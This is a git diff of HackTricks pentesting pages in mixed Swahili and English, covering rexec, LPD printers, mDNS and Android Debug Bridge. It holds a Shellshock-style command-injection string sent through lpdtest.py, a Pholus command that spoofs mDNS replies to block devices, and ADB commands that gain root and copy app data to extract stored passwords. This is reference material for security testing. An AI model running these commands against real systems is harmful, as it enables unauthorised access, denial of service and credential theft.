* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

40
network-services-pentesting/512-pentesting-rexec.md
View file

@ -1,40 +1,42 @@
# 512 - Pentesting Rexec
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Ni huduma ambayo **inakuwezesha kutekeleza amri ndani ya mwenyeji** ikiwa unajua **vitambulisho sahihi** (jina la mtumiaji na nywila).
Ni huduma ambayo **inakuwezesha kutekeleza amri ndani ya mwenyeji** ikiwa unajua **akikazi** halali (jina la mtumiaji na nenosiri).
**Bandari ya Default:** 512
**Default Port:** 512
```
PORT STATE SERVICE
512/tcp open exec
```
### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

46
network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
View file

@ -1,24 +1,25 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### **Utangulizi kwa Itifaki ya LPD**
### **Utangulizi wa Protokali ya LPD**
Katika miaka ya 1980, **Itifaki ya Line Printer Daemon (LPD)** ilianzishwa katika Berkeley Unix, ambayo baadaye ilifanywa rasmi kupitia RFC1179. Itifaki hii inafanya kazi kupitia bandari 515/tcp, kuruhusu mwingiliano kupitia amri ya `lpr`. Kiini cha uchapishaji kupitia LPD ni kutuma **faili ya kudhibiti** (kutaja maelezo ya kazi na mtumiaji) pamoja na **faili ya data** (ambayo inashikilia habari za uchapishaji). Wakati faili ya kudhibiti inaruhusu uchaguzi wa **muundo tofauti wa faili** kwa faili ya data, kushughulikia faili hizi kunategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama ya Unix ni **LPRng**. Kwa umuhimu, itifaki ya LPD inaweza kutumiwa kudukua na kutekeleza kazi za uchapishaji za **PostScript** au **PJL zenye nia mbaya**.
Katika miaka ya 1980, **Line Printer Daemon (LPD) protocol** ilitengenezwa katika Berkeley Unix, ambayo baadaye ilithibitishwa kupitia RFC1179. Protokali hii inafanya kazi kupitia bandari 515/tcp, ikiruhusu mwingiliano kupitia amri ya `lpr`. Kiini cha uchapishaji kupitia LPD kinahusisha kutuma **faili ya udhibiti** (ili kubainisha maelezo ya kazi na mtumiaji) pamoja na **faili ya data** (ambayo ina habari za uchapishaji). Wakati faili ya udhibiti inaruhusu uchaguzi wa **aina mbalimbali za faili** kwa faili ya data, usimamizi wa faili hizi unategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama Unix ni **LPRng**. Kwa kuzingatia, protokali ya LPD inaweza kutumika vibaya kutekeleza **PostScript mbaya** au **kazi za uchapishaji za PJL**.
### **Vyombo vya Mwingiliano na Printa za LPD**
### **Zana za Kuingiliana na Printer za LPD**
[**PRET**](https://github.com/RUB-NDS/PRET) inaleta zana mbili muhimu, `lpdprint` na `lpdtest`, zinazotoa njia rahisi ya kuingiliana na printa zinazofaa LPD. Zana hizi zinaruhusu vitendo mbalimbali kuanzia uchapishaji wa data hadi kubadilisha faili kwenye printa, kama kupakua, kupakia, au kufuta:
[**PRET**](https://github.com/RUB-NDS/PRET) inatoa zana mbili muhimu, `lpdprint` na `lpdtest`, zinazotoa njia rahisi ya kuingiliana na printer zinazofaa LPD. Zana hizi zinaruhusu aina mbalimbali za vitendo kutoka kwa uchapishaji wa data hadi kubadilisha faili kwenye printer, kama vile kupakua, kupakia, au kufuta:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
@ -33,23 +34,24 @@ lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
Kwa watu binafsi wanaopenda kuchunguza zaidi ulimwengu wa **uchomaji wa printa**, rasilimali kamili inaweza kupatikana hapa: [**Kuchoma Printa**](http://hacking-printers.net/wiki/index.php/Main_Page).
Kwa watu wanaovutiwa na kuchunguza zaidi ulimwengu wa **printer hacking**, rasilimali kamili inaweza kupatikana hapa: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page).
# Shodan
* `bandari 515`
* `port 515`
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu uchomaji wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za uchomaji kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

66
network-services-pentesting/5353-udp-multicast-dns-mdns.md
View file

@ -1,85 +1,87 @@
# 5353/UDP Multicast DNS (mDNS) na DNS-SD
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Taarifa Msingi**
## **Taarifa za Msingi**
**Multicast DNS (mDNS)** inawezesha **shughuli kama za DNS** ndani ya mitandao ya ndani bila kuhitaji seva ya DNS ya kawaida. Inafanya kazi kwenye **bandari ya UDP 5353** na inaruhusu vifaa kugundua wenyewe na huduma zao, mara nyingi zinazopatikana kwenye vifaa mbalimbali vya IoT. **DNS Service Discovery (DNS-SD)**, mara nyingi hutumiwa pamoja na mDNS, inasaidia kutambua huduma zinazopatikana kwenye mtandao kupitia maswali ya kawaida ya DNS.
**Multicast DNS (mDNS)** inaruhusu **operesheni kama za DNS** ndani ya mitandao ya ndani bila kuhitaji seva ya jadi ya DNS. Inafanya kazi kwenye **UDP port 5353** na inaruhusu vifaa kugundua kila mmoja na huduma zao, ambayo mara nyingi inaonekana katika vifaa mbalimbali vya IoT. **DNS Service Discovery (DNS-SD)**, ambayo mara nyingi hutumika pamoja na mDNS, inasaidia katika kutambua huduma zinazopatikana kwenye mtandao kupitia maswali ya kawaida ya DNS.
```
PORT STATE SERVICE
5353/udp open zeroconf
```
### **Uendeshaji wa mDNS**
Katika mazingira ambayo hayana seva ya DNS ya kawaida, mDNS inaruhusu vifaa kutatua majina ya kikoa yanayoishia na **.local** kwa kuuliza anwani ya multicast **224.0.0.251** (IPv4) au **FF02::FB** (IPv6). Mambo muhimu ya mDNS ni pamoja na thamani ya **Time-to-Live (TTL)** inayoonyesha uhalali wa rekodi na **biti ya QU** inayotofautisha kati ya maswali ya unicast na multicast. Kuhusu usalama, ni muhimu kwa utekelezaji wa mDNS kuhakikisha kuwa anwani ya chanzo cha pakiti inalingana na subnet ya ndani.
Katika mazingira yasiyo na seva ya kawaida ya DNS, mDNS inaruhusu vifaa kutatua majina ya kikoa yanayomalizika kwa **.local** kwa kuuliza anwani ya multicast **224.0.0.251** (IPv4) au **FF02::FB** (IPv6). Vipengele muhimu vya mDNS ni pamoja na thamani ya **Time-to-Live (TTL)** inayonyesha uhalali wa rekodi na **QU bit** inayotofautisha kati ya maswali ya unicast na multicast. Kwa upande wa usalama, ni muhimu kwa utekelezaji wa mDNS kuthibitisha kwamba anwani ya chanzo ya pakiti inalingana na subnet ya ndani.
### **Uendeshaji wa DNS-SD**
DNS-SD inawezesha ugunduzi wa huduma za mtandao kwa kuuliza rekodi za pointer (PTR) ambazo zinafanya ramani ya aina za huduma kwa mifano yao. Huduma zinatambuliwa kwa kutumia muundo wa **_\<Huduma>.\_tcp au \_\<Huduma>.\_udp** ndani ya kikoa cha **.local**, ambayo inasababisha ugunduzi wa rekodi za **SRV** na **TXT** zinazotoa habari za kina kuhusu huduma.
DNS-SD inarahisisha ugunduzi wa huduma za mtandao kwa kuuliza rekodi za pointer (PTR) zinazounganisha aina za huduma na mifano yao. Huduma zinatambulishwa kwa kutumia muundo wa **_\<Service>.\_tcp au \_\<Service>.\_udp** ndani ya kikoa cha **.local**, na kusababisha ugunduzi wa rekodi zinazolingana za **SRV** na **TXT** ambazo zinatoa maelezo ya kina kuhusu huduma.
### **Uchunguzi wa Mtandao**
#### **Matumizi ya nmap**
Amri muhimu kwa skanning ya mtandao wa ndani kwa huduma za mDNS ni:
Amri inayofaa kwa ajili ya skanning mtandao wa ndani kwa huduma za mDNS ni:
```bash
nmap -Pn -sUC -p5353 [target IP address]
```
Amri hii inasaidia kutambua bandari za mDNS zilizofunguliwa na huduma zinazotangazwa kupitia hizo.
Hii amri inasaidia kubaini bandari za mDNS zilizo wazi na huduma zinazotangazwa kupitia hizo.
#### **Uchunguzi wa Mtandao kwa Kutumia Pholus**
#### **Uainishaji wa Mtandao kwa kutumia Pholus**
Kwa kutuma ombi za mDNS kwa njia ya moja kwa moja na kukamata trafiki, zana ya **Pholus** inaweza kutumika kama ifuatavyo:
Ili kutuma maombi ya mDNS kwa njia ya kazi na kukamata trafiki, chombo cha **Pholus** kinaweza kutumika kama ifuatavyo:
```bash
sudo python3 pholus3.py [network interface] -rq -stimeout 10
```
## Mashambulizi
## Attacks
### **Kuathiri Uchunguzi wa mDNS**
### **Exploiting mDNS Probing**
Mbinu ya shambulizi inahusisha kutuma majibu ya uongo kwa uchunguzi wa mDNS, ikipendekeza kuwa majina yote yanayowezekana tayari yanatumika, hivyo kuzuia vifaa vipya kuchagua jina la pekee. Hii inaweza kutekelezwa kwa kutumia:
Njia ya shambulio inahusisha kutuma majibu ya uongo kwa mDNS probes, ikionyesha kwamba majina yote yanayowezekana tayari yanatumika, hivyo kuzuia vifaa vipya kuchagua jina la kipekee. Hii inaweza kufanywa kwa kutumia:
```bash
sudo python pholus.py [network interface] -afre -stimeout 1000
```
Teknikia hii inazuia vifaa vipya kusajili huduma zao kwenye mtandao.
H technique hii inazuia vifaa vipya kujiandikisha huduma zao kwenye mtandao.
**Kwa ufupi**, kuelewa jinsi mDNS na DNS-SD inavyofanya kazi ni muhimu kwa usimamizi na usalama wa mtandao. Zana kama **nmap** na **Pholus** hutoa ufahamu muhimu juu ya huduma za mtandao wa ndani, wakati ufahamu wa udhaifu unaosababishwa husaidia kulinda dhidi ya mashambulizi.
**Kwa muhtasari**, kuelewa jinsi mDNS na DNS-SD zinavyofanya kazi ni muhimu kwa usimamizi wa mtandao na usalama. Zana kama **nmap** na **Pholus** hutoa maarifa muhimu kuhusu huduma za mtandao wa ndani, wakati ufahamu wa hatari zinazoweza kutokea husaidia katika kulinda dhidi ya mashambulizi.
### Kudanganya/MitM
### Spoofing/MitM
Shambulio la kuvutia zaidi unaloweza kufanya kwenye huduma hii ni kufanya **MitM** katika **mawasiliano kati ya mteja na seva halisi**. Huenda ukaweza kupata faili nyeti (MitM mawasiliano na printer) au hata vibali (uthibitishaji wa Windows).\
Shambulio la kuvutia zaidi ambalo unaweza kufanya kupitia huduma hii ni kufanya **MitM** katika **mawasiliano kati ya mteja na seva halisi**. Unaweza kuwa na uwezo wa kupata faili nyeti (MitM mawasiliano na printer) au hata akidi (uthibitishaji wa Windows).\
Kwa maelezo zaidi angalia:
{% content-ref url="../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
## Marejeo
## Marejeleo
* [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

54
network-services-pentesting/5555-android-debug-bridge.md
View file

@ -1,69 +1,71 @@
# 5555 - Android Debug Bridge
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kutoka [nyaraka](https://developer.android.com/studio/command-line/adb):
From [the docs](https://developer.android.com/studio/command-line/adb):
**Android Debug Bridge** (adb) ni zana ya amri yenye uwezo ambayo inakuwezesha kuwasiliana na kifaa. Amri ya adb inawezesha aina mbalimbali za vitendo vya kifaa, kama vile **kusanikisha na kudukua programu**, na inatoa **upatikanaji wa kabati la Unix** ambalo unaweza kutumia kutekeleza aina mbalimbali za amri kwenye kifaa.
**Android Debug Bridge** (adb) ni zana ya amri ya mstari wa amri inayoweza kutumika kuwasiliana na kifaa. Amri ya adb inarahisisha vitendo mbalimbali vya kifaa, kama vile **kusanidi na kutatua matatizo ya programu**, na inatoa **ufikiaji wa shell ya Unix** ambayo unaweza kutumia kuendesha amri mbalimbali kwenye kifaa.
**Bandari ya chaguo**: 5555.
**Port ya kawaida**: 5555.
```
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
```
## Unganisha
## Connect
Ikiwa utapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuunganisha, **unaweza kupata kikao ndani ya mfumo:**
Ikiwa unapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuungana nayo, **unaweza kupata shell ndani ya mfumo:**
```bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
```
Kwa amri zaidi za ADB angalia ukurasa ufuatao:
Kwa maelezo zaidi ya amri za ADB angalia ukurasa ufuatao:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %}
[adb-commands.md](../mobile-pentesting/android-app-pentesting/adb-commands.md)
{% endcontent-ref %}
### Pata data ya programu
### Punguza data ya programu
Ili kupakua kabisa data ya programu, unaweza:
Ili kupakua kabisa data ya programu unaweza:
```bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
```
Unaweza kutumia mbinu hii ku **kupata taarifa nyeti kama nywila za Chrome**. Kwa maelezo zaidi kuhusu hili angalia habari na marejeo yaliyotolewa [**hapa**](https://github.com/carlospolop/hacktricks/issues/274).
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).
## Shodan
* `android debug bridge`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
